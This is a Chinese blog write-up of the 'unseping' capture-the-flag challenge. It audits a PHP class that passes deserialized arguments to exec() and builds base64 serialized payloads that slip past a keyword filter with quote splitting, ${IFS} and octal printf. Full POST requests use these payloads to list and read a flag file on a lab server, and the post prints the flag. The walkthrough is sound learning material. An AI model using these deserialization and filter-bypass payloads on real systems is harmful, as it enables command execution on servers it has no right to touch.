Web:攻防世界unseping

已于 2024-09-02 23:25:26 修改
阅读量965 收藏 14
点赞数 16
分类专栏: CTF习题 文章标签: web安全 php
于 2024-09-02 23:23:46 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_55038440/article/details/141831859
版权

目录

一、初见

 二、解题步骤

一、初见

        刚拿到这个题目,可以发现是一串PHP代码,关注到unserialize(base64_decode($ctf))函数,就知道是考php反序列化。

审计PHP类ease:

        __construct($method, $args) :构造器需要传入两个参数。

        __destruct():对象被销毁时候调用,可以看见这个函数的作用是判断method是否等于ping,等于则调用回调函数。回调函数的作用是将$this->args参数传参到函数$this->method(也就是ping)。

        ping($ip):内部调用exec($ip, $result)函数,这是一个 PHP 内置函数,用于执行外部程序或系统命令,带有两个参数,前一个是执行外部程序或系统命令,第二个参数是把执行结果存储,通常该参数是数组。var_dump($result):是输出变量的详细信息,也就是把命令执行的结果输出。

        waf($str):该方法是正则匹配过滤非法字符。

        __wakeup():是调用unserialize(base64_decode($ctf))时会调用的函数,作用是遍历数组,调用waf函数过滤非法字符。

分析可得:该代码的运行顺序是

        1、POST方法接收一个CTF参数值

        2、调用反序列函数unserialize(base64_decode($ctf))

        3、调用__construct()

        4、调用wakeup函数

        5、调用waf函数

        6、调用__destruct()

        7、调用ping函数     

        因为有exec命令,所以我们要构思如何让代码执行系统命令ls和cat进行查找和打开文件。可以发现对ls、cat、/、等都有过滤。我们可以通过八进制编码绕过或者Shell内置变量${IFS}等。为了调用ping函数,所以构造函数的第一个参数必须是ping。

 二、解题步骤

        有了思路开始构造序列化代码(反序列化的前提必须有反序列化),序列化代码必须包含类的定义。

<?php
 
 
class ease{
    
    private $method;
    private $args;
    function __construct($method, $args) {
        $this->method = $method;
        $this->args = $args;
    }
 
    function __destruct(){
        if (in_array($this->method, array("ping"))) {
            call_user_func_array(array($this, $this->method), $this->args);
        }
    } 
 
    function ping($ip){
        exec($ip, $result);
        //var_dump($result);
    }
 
    function waf($str){
        if (!preg_match_all("/(\||&|;| |\/|cat|flag|tac|php|ls)/", $str, $pat_array)) {
            return $str;
        } else {
            echo "don't hack";
        }
    }
 
    function __wakeup(){
        foreach($this->args as $k => $v) {
            $this->args[$k] = $this->waf($v);
        }
    }   
}
 
$ctf=new ease("ping",array('1234'));
 
echo base64_encode(@serialize($ctf));

?>

 这串代码获得了base64加密的$ctf对象的序列串,如下图所示。

         但这里我们还没有使用系统命令(给数组放入系统命令),尝试过滤写入,构造POST请求包。

$ctf=new ease("ping",array('l""s'));
POST / HTTP/1.1
Host: 61.147.171.105:55546
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded

ctf=Tzo0OiJlYXNlIjoyOntzOjEyOiIAZWFzZQBtZXRob2QiO3M6NDoicGluZyI7czoxMDoiAGVhc2UAYXJncyI7YToxOntpOjA7czo0OiJsIiJzIjt9fQ==

运行结果:

 可以发现flag,推测是个文件夹,继续构造。

$ctf=new ease("ping",array('l""s${IFS}f""lag_1s_here'));
POST / HTTP/1.1
Host: 61.147.171.105:55546
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded

ctf=Tzo0OiJlYXNlIjoyOntzOjEyOiIAZWFzZQBtZXRob2QiO3M6NDoicGluZyI7czoxMDoiAGVhc2UAYXJncyI7YToxOntpOjA7czoyNDoibCIicyR7SUZTfWYiImxhZ18xc19oZXJlIjt9fQ==

 看到flag文件,构造cat命令,尝试打开。

$ctf=new ease("ping",array('c""at${IFS}f""lag_1s_here$(printf${IFS}"\57")f""lag_831b69012c67b35f.p""hp'));
POST / HTTP/1.1
Host: 61.147.171.105:55546
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded

ctf=Tzo0OiJlYXNlIjoyOntzOjEyOiIAZWFzZQBtZXRob2QiO3M6NDoicGluZyI7czoxMDoiAGVhc2UAYXJncyI7YToxOntpOjA7czo3NDoiYyIiYXQke0lGU31mIiJsYWdfMXNfaGVyZSQocHJpbnRmJHtJRlN9Ilw1NyIpZiIibGFnXzgzMWI2OTAxMmM2N2IzNWYucCIiaHAiO319

最终发现flag:cyberpeace{e736ed0923c4a11df9eda0d29bcb6bdf} 

时之彼岸Φ
关注
专栏目录
攻防世界web新手练习unseping
JIN_7X的博客
09-26 4677
这是新手区第一题?不敢想象后边的题是什么样
CTF之一天一题:攻防世界web进阶之Cat
qq_42728977的博客
08-27 1583
这个题做的还是太明白,看了许多wp。在此小记录一下。 题目这个鸭子,看到以为是sql注入,但又看是输入域名,然后返回ping的结果,又像是命令执行漏洞,于是各种姿势试,无果。开始看wp。 大佬们是先fuzz一波,发现当url=@的时候报错,而@的的url编码是%80, ...
unseping
m0_56107268的博客
11-08 597
php反序列化
攻防世界--weiphp
qq_46263951的博客
01-19 1444
这道题原本应该是通过.git源码泄漏获取到源码,利用工具githack,可能是环境的问题,执行完发现目录是空的 直接从网上找源码,可能比源代码的内容要多一些 GitHub - weiphpdev/weiphp5.0: WeiPHP5.0,公众号与小程序结合的最佳开发框架,,它实现一个后台同时管理和运营多个客户端(公众号,微信小程序,后续将支持支付宝小程序,百度小程序等) 进入后的页面为一个登陆框,将login改为register发现该功能被禁用了 前台SQL注入 由于这里对title参数并没有检.
[江苏工匠杯]unseping
m0_73558058的博客
03-28 156
在每个类中都有一个构造方法,如果没有显示地声明它,那么类中都会默认存在一个没有参数且内容为空的构造方法。然后前面又说method只能输入ping,所以相当于调用后面的ping函数,传入的参数为args。作用:经常用在反序列化操作中,例如重新建立数据库连接,或执行其它初始化操作。因为过滤了空格所以我们使用${IFS}绕过,过滤了flag,我们继续通过双引号绕过。发现好长好长,稍微浏览一遍,发现了unserialize函数,说明这道题考到了。作用:调用回调函数,并把一个数组参数作为回调函数的参数。
攻防世界 unseping
10-20
攻防世界Wire1杂项题目中的unseping是一个反序列化漏洞利用题目。在这个题目中,用户可以通过POST请求传递一个经过base64编码和序列化的数据,然后在服务器端进行反序列化操作。攻击者可以构造一个恶意的序列化数据...
Web安全攻防:渗透测试实战指南 (徐焱)
最新发布
08-24
Web安全攻防:渗透测试实战指南 (徐焱)
攻防世界Wire1杂项
11-20
攻防世界Wire1杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127951997
攻防世界新手练习区——unseping
weixin_65049289的博客
12-21 4340
攻防世界新手练习区——unseping
攻防世界-unseping
m0_49025459的博客
12-17 2901
通过分析上面的代码我们可以得出,我们只要控制ctf这个参数的输入的值,就可以达成命令执行的效果,但是上面的代码,我们需要两个参数ping和后面命令执行的值,我们首先就得看看当前目录下都有些什么东西。我们看见 flag_1s_here目录下有一个flag_831b69012c67b35f.php,我们猜想运行这个php或者将它拿出来就可以获得flag,我们访问了该路径发现是空白的无法执行,那我们就用cat命令将这个php读取出来,我们可以使用三中命令读取。打开就是PHP源码,我们对源码进行分析。
攻防世界unseping
m0_73303597的博客
11-12 1669
自用
攻防世界unseping (反序列化与Linux bash shell)
2302_79800344的博客
04-01 1519
【代码】【攻防世界unseping (反序列化与Linux bash shell)
2024年最全攻防世界Web题 - unseping 总结_unseping攻防世界(1)
2401_84297796的博客
05-01 443
/把 cat flag_1s_here/flag_831b69012c67b35f.php 转为8进制如下:"\143\141\164\40\146\154\141\147\137\61\163\137\150\145\162\145\57\146\154\141\147\137\70\63\61\142\66\71\60\61\62\143\66\67\142\63\65\146\56\160\150\160"可以说是**最科学最系统的学习路线**,大家跟着这个大的方向学习准没问题。
【xctf之unseping
qq_40646572的博客
10-12 5232
这是一道,让我头皮发麻的题,前期感觉一般,后面感觉好像搞不定了。。。看了writeup才知道php还能这样用。。题目如上,一眼就可以看出这就是考察php的反序列化,感觉这不so easey?好像还真不是(菜鸡挠头)。首先就是正常的反序列化,在反序列化的时候首先触发__wakeup()函数,迭代args参数中的值进行过滤,解题的关键就是绕过这个过滤。可以看到,
【愚公系列】2023年05月 攻防世界-Webunseping
热门推荐
时光隧道
05-25 1万+
反序列化漏洞是一种安全漏洞,存在于那些使用序列化技术的应用程序中。反序列化是将已序列化数据还原回对象的过程。攻击者可以通过构造恶意序列化数据来利用反序列化漏洞,从而在受害者的系统上执行任意代码或者进行远程攻击。攻击者可以通过修改序列化数据中的类名来指定一个恶意的类,该类将在反序列化过程中被实例化并执行其中的代码。攻击者还可以利用在对象反序列化期间执行的构造函数或readObject()方法中的任意代码执行漏洞,来进行恶意代码执行。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值